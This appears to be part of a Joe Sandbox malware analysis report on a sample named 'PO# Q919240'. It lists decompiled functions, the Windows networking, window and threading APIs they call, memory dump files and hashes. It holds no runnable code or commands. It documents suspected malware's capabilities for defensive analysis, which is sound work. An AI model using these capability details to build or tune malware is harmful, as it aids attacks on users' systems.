                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Long$AttributesLayered
                • String ID:
                • API String ID: 2169480361-0
                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                • lstrlenW.KERNEL32(?), ref: 00434CF6
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: lstrcmpilstrcpylstrlen$_malloc
                • String ID: cdecl
                • API String ID: 3850814276-3896280584
                • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                • _memmove.LIBCMT ref: 0046D475
                • inet_ntoa.WSOCK32(?), ref: 0046D481
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                • String ID:
                • API String ID: 2502553879-0
                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32 ref: 00448C69
                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                Download Yara Rule
                APIs
                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLastacceptselect
                • String ID:
                • API String ID: 385091864-0
                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                • GetStockObject.GDI32(00000011), ref: 00430258
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$CreateMessageObjectSendShowStock
                • String ID:
                • API String ID: 1358664141-0
                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                Download Yara Rule
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                • String ID:
                • API String ID: 2880819207-0
                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32(?,?), ref: 00430BA2
                • ScreenToClient.USER32(?,?), ref: 00430BC1
                • ScreenToClient.USER32(?,?), ref: 00430BE2
                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ClientRectScreen$InvalidateWindow
                • String ID:
                • API String ID: 357397906-0
                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • __wsplitpath.LIBCMT ref: 0043392E
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • __wsplitpath.LIBCMT ref: 00433950
                • __wcsicoll.LIBCMT ref: 00433974
                • __wcsicoll.LIBCMT ref: 0043398A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                • String ID:
                • API String ID: 1187119602-0
                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$_malloc_wcscat_wcscpy
                • String ID:
                • API String ID: 1597257046-0
                • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                Download Yara Rule
                APIs
                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                • __malloc_crt.LIBCMT ref: 0041F5B6
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: EnvironmentStrings$Free__malloc_crt
                • String ID:
                • API String ID: 237123855-0
                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DeleteDestroyObject$IconWindow
                • String ID:
                • API String ID: 3349847261-0
                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                • String ID:
                • API String ID: 2223660684-0
                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                • LineTo.GDI32(?,?,?), ref: 00447326
                • EndPath.GDI32(?), ref: 00447336
                • StrokePath.GDI32(?), ref: 00447344
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                • String ID:
                • API String ID: 2783949968-0
                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                Download Yara Rule
                APIs
                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                • AttachThreadInput.USER32(00000000), ref: 004364AA
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
